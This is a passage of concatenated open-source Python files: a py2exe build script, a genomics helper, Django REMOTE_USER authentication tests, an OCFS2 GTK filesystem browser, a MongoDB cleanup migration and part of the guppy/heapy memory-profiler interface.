<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="%(prog)s"
type="win32"
/>
<description>%(prog)s Program</description>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
'''
RT_MANIFEST = 24
test_wx = Target(
# used for the versioninfo resource
description = "Notificateur de courrier électronique",
# what to build
script = "checkfeedmail.pyw",
other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog="checkfeedmail"))],
icon_resources = [(1, "mail.ico")],
dest_base = "checkfeedmail")
################################################################
setup(
options = {"py2exe": {"compressed": 1,
"optimize": 2,
"ascii": 1,
"bundle_files": 1,
"packages": ["encodings"],}},
zipfile = None,
windows = [test_wx],
data_files=[("",["C:\Python25\lib\site-packages\wx-2.8-msw-ansi\wx\MSVCP71.dll",
"C:\Python25\lib\site-packages\wx-2.8-msw-ansi\wx\gdiplus.dll",
"notification.wav",
"newsalert.wav",
"silkyalert.wav",
"zoombonus.wav",
"goodmorning.wav",
"harmony.wav",
])]
)
os.startfile("checkfeedmail.iss","compile")
|
mskcc/iCallSV
|
refs/heads/master
|
iCallSV/helper.py
|
2
|
"""
helper
~~~~~~~~~~~~~~~
:Description: helper has many utilities for iCallSV
"""
'''
Created on February 2, 2017
Description: helper has many utilities for iCallSV
@author: Ronak H Shah
A) make_empty_output: Will make an empty output file with header
::Input::
outFile: string containing path to write the output
::Output::
outputFile: File with following header
"TumorId\tNormalId\tChr1\tPos1\tChr2\tPos2\tSV_Type\tGene1\tGene2\tTranscript1\tTranscript2\tSite1Description\tSite2Description\tFusion\tProbabilityScore\tConfidence\tComments\tConnection_Type\tSV_LENGTH\tMAPQ\tPairEndReadSupport\tSplitReadSupport\tBrkptType\tConsensusSequence\tTumorVariantCount\tTumorSplitVariantCount\tTumorReadCount\tTumorGenotypeQScore\tNormalVariantCount\tNormalSplitVariantCount\tNormalReadCount\tNormalGenotypeQScorerepName-repClass-repFamily:-site1\trepName-repClass-repFamily:-site2\tCC_Chr_Band\tCC_Tumour_Types(Somatic)\tCC_Cancer_Syndrome\tCC_Mutation_Type\tCC_Translocation_Partner\tDGv_Name-DGv_VarType-site1\tDGv_Name-DGv_VarType-site2\n";
'''
import os
import sys
import tempfile
os.environ['MPLCONFIGDIR'] = tempfile.mkdtemp()  # So that matplotlib does not complain about a stale file handle
try:
    import pandas as pd
except ImportError, e:
    print "helper: pandas is not installed, please install pandas as it is required to run the mapping."
    sys.exit(1)
def make_empty_outputfile(outFile):
outDF = pd.DataFrame(
columns=[
"TumorId",
"NormalId",
"Chr1",
"Pos1",
"Chr2",
"Pos2",
"SV_Type",
"Gene1",
"Gene2",
"Transcript1",
"Transcript2",
"Site1Description",
"Site2Description",
"Fusion",
"ProbabilityScore",
"Confidence",
"Comments",
"Connection_Type",
"SV_LENGTH",
"MAPQ",
"PairEndReadSupport",
"SplitReadSupport",
"BrkptType",
"ConsensusSequence",
"TumorReferenceCount",
"TumorSplitReferenceCount",
"TumorVariantCount",
"TumorSplitVariantCount",
"TumorReadCount",
"TumorGenotypeQScore",
"NormalReferenceCount",
"NormalSplitReferenceCount",
"NormalVariantCount",
"NormalSplitVariantCount",
"NormalReadCount",
"NormalGenotypeQScore",
"Cosmic_Fusion_Counts",
"repName-repClass-repFamily:-site1",
"repName-repClass-repFamily:-site2",
"CC_Chr_Band",
"CC_Tumour_Types(Somatic)",
"CC_Cancer_Syndrome",
"CC_Mutation_Type",
"CC_Translocation_Partner",
"DGv_Name-DGv_VarType-site1",
"DGv_Name-DGv_VarType-site2"])
outDF.to_csv(outFile, sep='\t', index=False)
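# Illustrative sketch, not part of the original module: writing the
# header-only table described in the module docstring; the output path below
# is a hypothetical example.
# make_empty_outputfile("/tmp/icallsv_structural_variants.txt")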
|
zhoulingjun/django
|
refs/heads/master
|
tests/auth_tests/test_remote_user.py
|
275
|
from datetime import datetime
from django.conf import settings
from django.contrib.auth import authenticate
from django.contrib.auth.backends import RemoteUserBackend
from django.contrib.auth.middleware import RemoteUserMiddleware
from django.contrib.auth.models import User
from django.test import TestCase, modify_settings, override_settings
from django.utils import timezone
@override_settings(ROOT_URLCONF='auth_tests.urls')
class RemoteUserTest(TestCase):
middleware = 'django.contrib.auth.middleware.RemoteUserMiddleware'
backend = 'django.contrib.auth.backends.RemoteUserBackend'
header = 'REMOTE_USER'
# Usernames to be passed in REMOTE_USER for the test_known_user test case.
known_user = 'knownuser'
known_user2 = 'knownuser2'
def setUp(self):
self.patched_settings = modify_settings(
AUTHENTICATION_BACKENDS={'append': self.backend},
MIDDLEWARE_CLASSES={'append': self.middleware},
)
self.patched_settings.enable()
def tearDown(self):
self.patched_settings.disable()
def test_no_remote_user(self):
"""
        Tests requests where no remote user is specified and ensures that no
users get created.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', **{self.header: None})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', **{self.header: ''})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
def test_unknown_user(self):
"""
Tests the case where the username passed in the header does not exist
as a User.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertEqual(response.context['user'].username, 'newuser')
self.assertEqual(User.objects.count(), num_users + 1)
User.objects.get(username='newuser')
# Another request with same user should not create any new users.
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertEqual(User.objects.count(), num_users + 1)
def test_known_user(self):
"""
Tests the case where the username passed in the header is a valid User.
"""
User.objects.create(username='knownuser')
User.objects.create(username='knownuser2')
num_users = User.objects.count()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
self.assertEqual(User.objects.count(), num_users)
# Test that a different user passed in the headers causes the new user
# to be logged in.
response = self.client.get('/remote_user/',
**{self.header: self.known_user2})
self.assertEqual(response.context['user'].username, 'knownuser2')
self.assertEqual(User.objects.count(), num_users)
def test_last_login(self):
"""
Tests that a user's last_login is set the first time they make a
request but not updated in subsequent requests with the same session.
"""
user = User.objects.create(username='knownuser')
# Set last_login to something so we can determine if it changes.
default_login = datetime(2000, 1, 1)
if settings.USE_TZ:
default_login = default_login.replace(tzinfo=timezone.utc)
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertNotEqual(default_login, response.context['user'].last_login)
user = User.objects.get(username='knownuser')
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(default_login, response.context['user'].last_login)
def test_header_disappears(self):
"""
Tests that a logged in user is logged out automatically when
the REMOTE_USER header disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER header disappears. Should trigger logout.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), True)
# verify the remoteuser middleware will not remove a user
# authenticated via another backend
User.objects.create_user(username='modeluser', password='foo')
self.client.login(username='modeluser', password='foo')
authenticate(username='modeluser', password='foo')
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].username, 'modeluser')
def test_user_switch_forces_new_login(self):
"""
Tests that if the username in the header changes between requests
that the original user is logged out
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER changes to a different user.
response = self.client.get('/remote_user/',
**{self.header: "newnewuser"})
# Ensure that the current user is not the prior remote_user
# In backends that create a new user, username is "newnewuser"
# In backends that do not create new users, it is '' (anonymous user)
self.assertNotEqual(response.context['user'].username, 'knownuser')
class RemoteUserNoCreateBackend(RemoteUserBackend):
"""Backend that doesn't create unknown users."""
create_unknown_user = False
class RemoteUserNoCreateTest(RemoteUserTest):
"""
Contains the same tests as RemoteUserTest, but using a custom auth backend
class that doesn't create unknown users.
"""
backend = 'auth_tests.test_remote_user.RemoteUserNoCreateBackend'
def test_unknown_user(self):
num_users = User.objects.count()
response = self.client.get('/remote_user/', **{self.header: 'newuser'})
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
class CustomRemoteUserBackend(RemoteUserBackend):
"""
Backend that overrides RemoteUserBackend methods.
"""
def clean_username(self, username):
"""
Grabs username before the @ character.
"""
return username.split('@')[0]
def configure_user(self, user):
"""
Sets user's email address.
"""
user.email = 'user@example.com'
user.save()
return user
class RemoteUserCustomTest(RemoteUserTest):
"""
Tests a custom RemoteUserBackend subclass that overrides the clean_username
and configure_user methods.
"""
backend = 'auth_tests.test_remote_user.CustomRemoteUserBackend'
# REMOTE_USER strings with email addresses for the custom backend to
# clean.
known_user = 'knownuser@example.com'
known_user2 = 'knownuser2@example.com'
def test_known_user(self):
"""
The strings passed in REMOTE_USER should be cleaned and the known users
should not have been configured with an email address.
"""
super(RemoteUserCustomTest, self).test_known_user()
self.assertEqual(User.objects.get(username='knownuser').email, '')
self.assertEqual(User.objects.get(username='knownuser2').email, '')
def test_unknown_user(self):
"""
The unknown user created should be configured with an email address.
"""
super(RemoteUserCustomTest, self).test_unknown_user()
newuser = User.objects.get(username='newuser')
self.assertEqual(newuser.email, 'user@example.com')
class CustomHeaderMiddleware(RemoteUserMiddleware):
"""
Middleware that overrides custom HTTP auth user header.
"""
header = 'HTTP_AUTHUSER'
class CustomHeaderRemoteUserTest(RemoteUserTest):
"""
Tests a custom RemoteUserMiddleware subclass with custom HTTP auth user
header.
"""
middleware = (
'auth_tests.test_remote_user.CustomHeaderMiddleware'
)
header = 'HTTP_AUTHUSER'
class PersistentRemoteUserTest(RemoteUserTest):
"""
PersistentRemoteUserMiddleware keeps the user logged in even if the
subsequent calls do not contain the header value.
"""
middleware = 'django.contrib.auth.middleware.PersistentRemoteUserMiddleware'
require_header = False
def test_header_disappears(self):
"""
A logged in user is kept logged in even if the REMOTE_USER header
disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/', **{self.header: self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# Should stay logged in if the REMOTE_USER header disappears.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), False)
self.assertEqual(response.context['user'].username, 'knownuser')
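# Illustrative sketch, not part of the test module: the production setup these
# tests exercise is plain settings configuration. The snippet below follows the
# Django documentation for REMOTE_USER authentication; it is an assumption,
# not taken from this repository.
# MIDDLEWARE_CLASSES = [
#     # ...
#     'django.contrib.auth.middleware.AuthenticationMiddleware',
#     'django.contrib.auth.middleware.RemoteUserMiddleware',
# ]
# AUTHENTICATION_BACKENDS = [
#     'django.contrib.auth.backends.RemoteUserBackend',
# ]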
|
abligh/ocfs2-tools
|
refs/heads/ubuntu-precise-1.8.2
|
ocfs2console/ocfs2interface/bosa.py
|
8
|
# OCFS2Console - GUI frontend for OCFS2 management and debugging
# Copyright (C) 2002, 2005 Oracle. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 021110-1307, USA.
import gtk
import gobject
import pango
import ocfs2
try:
IdleBase = gobject.Idle
except AttributeError:
import gidle
IdleBase = gidle.Idle
from guiutil import set_props
from ls import fields
INFO_LABEL_FONT = pango.FontDescription('monospace')
(
COLUMN_NAME,
COLUMN_INFO_OBJECT,
COLUMN_ICON,
COLUMN_ITALIC
) = range(4)
STOCK_LOADING = gtk.STOCK_REFRESH
STOCK_EMPTY = gtk.STOCK_STOP
STOCK_ERROR = gtk.STOCK_DIALOG_ERROR
try:
STOCK_FILE = gtk.STOCK_FILE
except AttributeError:
STOCK_FILE = gtk.STOCK_NEW
try:
STOCK_DIRECTORY = gtk.STOCK_DIRECTORY
except AttributeError:
STOCK_DIRECTORY = gtk.STOCK_OPEN
INVALID_DENTRY = 'poop'
class InfoLabel(gtk.Label):
def __init__(self, field_type):
gtk.Label.__init__(self)
self.set_selectable(True)
self.field_type = field_type
if field_type.right_justify:
set_props(self, xalign=1.0)
else:
set_props(self, xalign=0.0)
self.modify_font(INFO_LABEL_FONT)
if hasattr(field_type, 'width_chars'):
context = self.get_pango_context()
desc = INFO_LABEL_FONT.copy()
desc.set_size(context.get_font_description().get_size())
metrics = context.get_metrics(desc, context.get_language())
char_width = metrics.get_approximate_char_width()
digit_width = metrics.get_approximate_digit_width()
char_pixels = pango.PIXELS(max(char_width, digit_width))
self.set_size_request(char_pixels * field_type.width_chars, -1)
def update(self, dentry, dinode):
field = self.field_type(dentry, dinode)
self.set_text(field.text)
def clear(self):
self.set_text('')
class Browser(gtk.VBox):
def __init__(self, device=None):
self.device = device
gtk.VBox.__init__(self, spacing=4)
label = gtk.Label('/')
set_props(label, xalign=0.0,
selectable=True,
wrap=True)
self.pack_start(label, expand=False)
self.path_label = label
self.scrl_win = gtk.ScrolledWindow()
self.scrl_win.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
self.add(self.scrl_win)
self.make_dentry_store()
self.make_file_view()
self.make_ls_fields()
self.connect('destroy', self.destroy_handler)
self.refresh()
def make_dentry_store(self):
def tree_compare(store, a, b):
d1 = self.get_dentry(store, a)
d2 = self.get_dentry(store, b)
if d1 is d2:
return 0
elif d1 is INVALID_DENTRY:
return 1
elif d2 is INVALID_DENTRY:
return -1
elif d1 and not d2:
return 1
elif not d1 and d2:
return -1
elif d1.file_type != d2.file_type:
if d1.file_type == ocfs2.FT_DIR:
return -1
elif d2.file_type == ocfs2.FT_DIR:
return 1
else:
return cmp(d1.name, d2.name)
else:
return cmp(d1.name, d2.name)
self.store = gtk.TreeStore(str, gobject.TYPE_PYOBJECT,
str, gobject.TYPE_BOOLEAN)
self.store.set_sort_func(COLUMN_NAME, tree_compare)
self.store.set_sort_column_id(COLUMN_NAME, gtk.SORT_ASCENDING)
def make_file_view(self):
tv = gtk.TreeView(self.store)
self.scrl_win.add(tv)
set_props(tv, headers_visible=False)
column = gtk.TreeViewColumn()
renderer = gtk.CellRendererPixbuf()
column.pack_start(renderer, expand=False)
column.set_attributes(renderer, stock_id=COLUMN_ICON)
renderer = gtk.CellRendererText()
renderer.set_property('style', pango.STYLE_ITALIC)
column.pack_start(renderer, expand=True)
column.set_attributes(renderer, text=COLUMN_NAME,
style_set=COLUMN_ITALIC)
tv.append_column(column)
tv.connect('test_expand_row', self.tree_expand_row)
tv.connect('test_collapse_row', self.tree_collapse_row)
sel = tv.get_selection()
sel.connect('changed', self.select_dentry)
def make_ls_fields(self):
table = gtk.Table(rows=2, columns=7)
set_props(table, row_spacing=4,
column_spacing=4,
border_width=4)
self.pack_end(table, expand=False, fill=False)
self.info_labels = []
for column, field in enumerate(fields):
label = gtk.Label(field.label)
if field.right_justify:
set_props(label, xalign=1.0)
else:
set_props(label, xalign=0.0)
xoptions = yoptions = gtk.FILL
xpadding = 2
table.attach(label, column, column + 1, 0, 1,
xoptions, yoptions, xpadding)
label = InfoLabel(field)
table.attach(label, column, column + 1, 1, 2,
xoptions, yoptions, xpadding)
self.info_labels.append(label)
def destroy_handler(self, obj):
self.cleanup()
def make_dentry_node(self, dentry, stock_id, parent=None):
return self.store.append(parent, (dentry.name, dentry, stock_id, False))
def make_file_node(self, dentry, parent=None):
self.make_dentry_node(dentry, STOCK_FILE, parent)
def make_dir_node(self, dentry, parent=None):
iter = self.make_dentry_node(dentry, STOCK_DIRECTORY, parent)
self.store.append(iter, ('.', dentry, None, False))
def make_loading_node(self, parent=None):
self.store.append(parent, ('Loading...', None, STOCK_LOADING, True))
def make_empty_node(self, parent=None):
self.store.append(parent, ('Empty', None, STOCK_EMPTY, True))
def make_error_node(self, parent=None):
self.store.append(parent, ('Error', INVALID_DENTRY, STOCK_ERROR, True))
def cleanup(self):
if hasattr(self, 'levels'):
for level in self.levels:
level.destroy()
self.levels = []
def refresh(self):
self.cleanup()
self.store.clear()
self.fs = None
if self.device:
try:
self.fs = ocfs2.Filesystem(self.device)
except ocfs2.error:
self.make_error_node()
if self.fs:
self.add_level()
else:
self.make_empty_node()
def add_level(self, dentry=None, parent=None):
if parent:
iter = self.store.iter_children(parent)
name = self.store[iter][COLUMN_NAME]
if name != '.':
return
del self.store[iter]
try:
diriter = self.fs.iterdir(dentry)
except ocfs2.error:
self.make_error_node(parent)
return
self.make_loading_node(parent)
level = TreeLevel(diriter, dentry, parent)
self.levels.append(level)
if parent:
self.store[parent][COLUMN_INFO_OBJECT] = level
level.set_callback(self.populate_level, level)
level.attach()
def populate_level(self, level):
try:
dentry = level.diriter.next()
except (StopIteration, ocfs2.error), e:
self.destroy_level(level, isinstance(e, ocfs2.error))
return False
if dentry.file_type == ocfs2.FT_DIR:
self.make_dir_node(dentry, level.parent)
else:
self.make_file_node(dentry, level.parent)
return True
def destroy_level(self, level, error=False):
if error:
self.make_error_node(level.parent)
else:
children = self.store.iter_n_children(level.parent)
if children < 2:
self.make_empty_node(level.parent)
if level.parent:
self.store[level.parent][COLUMN_INFO_OBJECT] = level.dentry
# Argh, ancient pygtk can't handle None being passed to
# iter_children
iter = self.store.iter_children(level.parent)
else:
iter = self.store.get_iter_first()
self.store.remove(iter)
self.levels.remove(level)
del level.diriter
def tree_expand_row(self, tv, iter, path):
info_obj = self.store[iter][COLUMN_INFO_OBJECT]
        if isinstance(info_obj, TreeLevel):
            level = info_obj
            level.collapsed = False
            level.foreground()
else:
self.add_level(info_obj, iter)
def tree_collapse_row(self, tv, iter, path):
info_obj = self.store[iter][COLUMN_INFO_OBJECT]
if isinstance(info_obj, TreeLevel):
level = info_obj
level.collapsed = True
level.background()
def select_dentry(self, sel):
store, iter = sel.get_selected()
if store and iter:
dentry = self.get_dentry(store, iter)
else:
dentry = None
if dentry:
self.display_dentry(dentry)
else:
self.display_clear()
if iter:
iter = store.iter_parent(iter)
self.path_label.set_text(self.get_fs_path(store, iter))
def display_dentry(self, dentry):
dinode = self.fs.read_cached_inode(dentry.inode)
for label in self.info_labels:
label.update(dentry, dinode)
def display_clear(self):
for label in self.info_labels:
label.clear()
def get_dentry(self, store, iter):
info_obj = store[iter][COLUMN_INFO_OBJECT]
if isinstance(info_obj, ocfs2.DirEntry):
return info_obj
elif isinstance(info_obj, TreeLevel):
return info_obj.dentry
else:
return None
def get_fs_path(self, store, iter):
parts = []
while iter:
dentry = self.get_dentry(store, iter)
parts.append(dentry.name)
iter = store.iter_parent(iter)
parts.reverse()
return '/' + '/'.join(parts)
class TreeLevel(IdleBase):
def __init__(self, diriter, dentry=None, parent=None):
IdleBase.__init__(self)
self.diriter = diriter
self.dentry = dentry
if parent:
self.parent = parent.copy()
else:
self.parent = None
self.collapsed = False
def foreground(self):
if not self.collapsed:
self.priority = gobject.PRIORITY_DEFAULT_IDLE
def background(self):
self.priority = gobject.PRIORITY_LOW
def main():
import sys
def dummy(*args):
gtk.main_quit()
window = gtk.Window()
window.set_default_size(400, 300)
window.connect('delete_event', dummy)
browser = Browser(sys.argv[1])
window.add(browser)
window.show_all()
gtk.main()
if __name__ == '__main__':
main()
|
rageandqq/rmc
|
refs/heads/master
|
migrations/delete_non_existing_course_user_courses.py
|
8
|
import rmc.models as m
import rmc.shared.constants as c
import mongoengine as me
def delete_non_existing_course_user_courses():
"""
NOTE: Do not run this yet, as it seems from dry run that there are
some usercourses that we would be deleting that are legit courses
that we should try getting into our Course collection.
    Delete UserCourse models that reference Course objects we don't have
(e.g. wkrpt100)"""
for uc in m.UserCourse.objects:
if not m.Course.objects.with_id(uc.course_id):
print 'deleting: %s, %s, %s' % (
uc.user_id, uc.course_id, uc.term_id)
uc.delete()
if __name__ == '__main__':
me.connect(c.MONGO_DB_RMC)
delete_non_existing_course_user_courses()
|
yoer/hue
|
refs/heads/master
|
desktop/core/ext-py/guppy-0.1.10/guppy/heapy/Use.py
|
37
|
#._cv_part guppy.heapy.Use
import guppy.etc.Glue
class _GLUECLAMP_(guppy.etc.Glue.Interface):
_preload_ = '_hiding_tag_',
_chgable_ = ('reprefix', 'default_reprefix', 'gcobjs',
'relheap', 'relheapg', 'relheapu', '__doc__')
_dir_ = (
'Anything', 'Class', 'Clodo', 'Id', 'Idset', 'Module',
'Nothing', 'Rcs', 'Root', 'Size', 'Type', 'Unity',
'Via', 'doc', 'findex', 'heap', 'heapu',
'idset','iso', 'load', 'monitor', 'pb',
'setref', 'test')
_private_ = ('View','_hiding_tag_','_load_stat','ctime','default_reprefix',
'dumph','gcobjs','heapg','loadc','relheap','relheapg',
'relheapu','reprefix','setrelheap','setrelheapg',
'setrelheapu','tc_adapt','tc_repr','union',
'uniset_from_setcsatable','warnings','Stat'
)
default_reprefix = 'hpy().'
def _get_gcobjs(self):
return self.Nothing
def _get_relheap(self):
return self.Nothing
def _get_relheapg(self):
return self.Nothing
def _get_relheapu(self):
return self.Nothing
def _get_reprefix(self):
# The name that this instance (or one with the same ._share)
# has in the __main__ module, if any, or self.default_reprname otherwise.
# Used for prefixing the result of repr() of various objects
# so it becomes possible to evaluate it in a typical environment.
import __main__
for k, v in __main__.__dict__.items():
if (isinstance(v, self.__class__) and
getattr(v, '_share', None) is self._share):
return '%s.'%k
return self.default_reprefix
def _get_Root(self):
"""Root: RootStateType
This attribute is a symbolic root containing attributes from which all
reachable objects in the heap can be reached. It is the only value (a
singleton) of its kind; see [1] for a description of its attributes.
References
[0] heapy_Use.html#heapykinds.Use.Root
[1] heapy_RootState.html#heapykinds.RootStateType"""
return self.View.heapyc.RootState
def __repr__(self):
return """\
Top level interface to Heapy.
Use eg: %sdoc for more info on %s.""" %(
self.reprefix,self.reprefix[:-1])
__str__=__repr__
def Ddir(self, opts=''):
"""\
#OBSOLETE
$HP.dir([opts: str+]) -> GuppyDir
$HP.dir([opts: str+]).<attribute> -> GuppyDoc
A replacement for the builtin function dir(), providing a listing of
public attributes for Heapy objects. It also has an attribute for each
item in the listing, for example:
>>> $HP.dir().heap
returns a GuppyDoc object providing documentation for the heap
method. The method also takes a string argument specifying further
options. Currently the following are provided:
'l' Generate a listing of the synopsis lines.
'L' Generate a listing of the entire doc strings."""
obj = self
return self._root.guppy.etc.Help.dir(obj, opts)
def _get_doc(self):
"""Overview documentation for top level Heapy object.
Provides a listing of the available attributes.
Accessing the attribute name on the doc objects gives further info, eg:
>>> hp.doc.heap
gives doc for the heap method when hp is the top level Heapy object.
References may be embedded in the documentations. To access a
reference, opening up a web browser with the doc for it one can do eg:
>>> hp.doc.heap[1]
The reference number 0 is special. If it is provided, it is the
reference to the html doc for the described object itself. So to see
in the web browser the doc for the heap method one can do:
>>> hp.doc.heap[0]
References
[0] heapy_Use.html#heapykinds.Use.doc"""
return self._root.guppy.etc.Help.dir(self,
header="""\
Top level interface to Heapy. Available attributes:""",
footer="""\
Use eg: %sdoc.<attribute> for info on <attribute>."""%self.reprefix)
def heapg(self, rma=1):
""" DEPRECATED """
self.warnings.warn(
"Method Use.heapg is depreciated, it doesn't work well. Use heapu instead.")
h = self.View.heapg(rma)
h -= self.relheapg
return h
def heapu(self, rma=1, abs=0, stat=1):
"""heapu() -> Stat
Finds the objects in the heap that remain after garbage collection but
are _not_ reachable from the root. This can be used to find objects
in extension modules that remain in memory even though they are
gc-collectable and not reachable.
Returns an object containing a statistical summary of the objects
found - not the objects themselves. This is to avoid making the
objects reachable.
See also: setref[1]
References
[0] heapy_Use.html#heapykinds.Use.heapu
[1] heapy_Use.html#heapykinds.Use.setref"""
h = self.View.heapu(rma)
rel = 0
if not abs and self.relheapu and isinstance(self.relheapu, type(h)):
h -= self.relheapu
rel = 1
if stat:
h = h.stat
if not abs and self.relheapu and isinstance(self.relheapu, type(h)):
h -= self.relheapu
rel = 1
h.firstheader = 'Data from unreachable objects'
if rel:
h.firstheader += ' relative to: %s'%\
self.ctime(self.relheapu.timemade)
h.firstheader += '.\n'
return h
def heap(self):
"""heap() -> IdentitySet[1]
Traverse the heap from a root to find all reachable and visible
objects. The objects that belong to a heapy instance are normally not
included. Return an IdentitySet with the objects found, which is
presented as a table partitioned according to a default equivalence
relation (Clodo [3]).
See also: setref[2]
References
[0] heapy_Use.html#heapykinds.Use.heap
[1] heapy_UniSet.html#heapykinds.IdentitySet
[2] heapy_Use.html#heapykinds.Use.setref
[3] heapy_Use.html#heapykinds.Use.Clodo"""
h = self.View.heap()
h |= self.gcobjs
h -= self.relheap
return h
def load(self, fn, use_readline=0):
"""\
load(alt:[fn: loadablefilenamestring+ or
fn: loadableiterableofstrings+]
[use_readline = boolean+]) -> Stat
Load heapy-related data from a serialized form. Currently it handles
data generated by Stat.dump.
Arguments
fn: loadablefilenamestring+
A string argument is treated as a file name.
fn: loadableiterableofstrings+
An open file or an iterator will be iterated over enough
to read one package of data, and another call to load
will read the next package.
use_readline = boolean+
If true, the method will use .readline() instead of
iteration, which may be necessary in case the input
comes from a pipe since otherwise the Python runtime
would try to read ahead a big block before returning the
first package of data.
Returns
one package of statistical data.
References
[0] heapy_Use.html#heapykinds.Use.load"""
if isinstance(fn, basestring):
# We got a filename.
# I want to read only what is being requested
# so I can look quickly at some lines of a long table.
# (There are seemingly easier ways to do this
# but this takes care of some tricky details.
# Keeping f open prevents it from being overwritten
# (at least by Stat.dump() and on Linux)
# if data are written to a new file with the same name.)
f = open(fn)
def get_trows():
pos = 0
while 1:
f.seek(pos)
line = f.readline()
if not line:
break
pos = f.tell()
yield line
elif hasattr(fn, '__iter__') and not hasattr(fn, 'next'):
# We got a sequence, that is not an iterator. Use it directly.
def get_trows():
return fn
elif hasattr(fn, 'next'):
# We got an iterator or file object.
# We have to read all lines (at once)
# to update the read position,
# to mimic 'pickle' semantics when several
# objects are stored in the same file.
# We can't always use .next() (eg not on pipes):
# it makes a big readahead regardless of buffering setting.
# But since .next() is (typically) much faster, we use it
# by default unless use_readline is set.
if use_readline:
get_line = fn.readline
else:
get_line = fn.next
trows = []
line = get_line()
if not line:
raise StopIteration
endline = '.end: %s'%line
try:
while line:
trows.append(line)
if line == endline:
break
line = get_line()
else:
raise StopIteration
except StopIteration:
trows.append(endline)
def get_trows():
return trows
else:
raise TypeError, 'Argument should be a string, file or an iterable yielding strings.'
a = iter(get_trows()).next()
if not a.startswith('.loader:'):
raise ValueError, 'Format error in %r: no initial .loader directive.'%fn
loader = a[a.index(':')+1:].strip()
try:
loader = getattr(self, loader)
except AttributeError:
raise ValueError, 'Format error in %r: no such loader: %r.'%(fn, loader)
return loader(get_trows)
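# A round-trip sketch (the file name '/tmp/heap.stat' is an assumption, not from the source):
#   >>> hp.heap().stat.dump('/tmp/heap.stat')   # Stat.dump writes one package of data
#   >>> st = hp.load('/tmp/heap.stat')          # load reads one package back as a Stat object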
def loadall(self,f):
''' Generates all objects from an open file f or a file named f'''
if isinstance(f,basestring):
f=open(f)
while True:
yield self.load(f)
def loadc(self, fn):
f = open(fn, 'r', 1)
while 1:
print self.load(f, use_readline=1)
def dumph(self, fn):
f = open(fn, 'w')
import gc
while 1:
x = self.heap()
x.stat.dump(f)
f.flush()
print len(gc.get_objects())
def setref(self, reachable=None, unreachable=None):
"""setref()
Set a reference point for heap usage measurement. This applies to
both the heap[1] and heapu[2] methods. The heap() method will only
show the objects allocated after the time setref was called. The
heapu() method, since it deals with summary data and not actual
objects, will show the difference of sizes and counts compared to when
setref was called.
References
[0] heapy_Use.html#heapykinds.Use.setref
[1] heapy_Use.html#heapykinds.Use.heap
[2] heapy_Use.html#heapykinds.Use.heapu"""
if reachable is None and unreachable is None:
self.setrelheap()
self.setrelheapu()
else:
if reachable is not None:
self.setrelheap(reachable)
if unreachable is not None:
self.setrelheapu(unreachable)
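# A minimal sketch of the intended workflow (illustrative objects only):
#   >>> hp.setref()                            # remember the current heap as the baseline
#   >>> data = [list(range(100)) for _ in range(10)]
#   >>> hp.heap()                              # now shows (mostly) objects created after setref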
def setrelheap(self, reference=None):
if reference is None:
reference = self.View.heap()
self.relheap = reference
def setrelheapg(self, reference=None):
self.warnings.warn(
"Method Use.setrelheapg is depreciated, use setref instead.")
if reference is None:
self.relheapg = None
reference = self.View.heapg()
self.relheapg = reference
def setrelheapu(self, reference=None,stat=1):
if reference is None:
self.relheapu = None
reference = self.heapu(abs=True, stat=stat)
if stat and not isinstance(reference, self.Stat):
reference = reference.stat
self.relheapu = reference
def test(self, debug=False):
"""test([debug: bool+ = False])
Run the Heapy test suite.
Argument
debug
If True, the tests will be run in debug mode so the stack frame
can be examined with pdb.pm() after the first exception."""
self._parent.test.test_all.test_main(debug)
_imports_ = (
'_parent.Classifiers:Class',
'_parent.Classifiers:Clodo',
'_parent.Classifiers:Id',
'_parent.Classifiers:Idset',
'_parent.Classifiers:Module',
'_parent.Classifiers:Rcs',
'_parent.Classifiers:Size',
'_parent.Classifiers:Type',
'_parent.Classifiers:Unity',
'_parent.Classifiers:Via',
'_parent.Classifiers:findex',
'_parent.Classifiers:sonokind',
'_parent.Classifiers:tc_adapt',
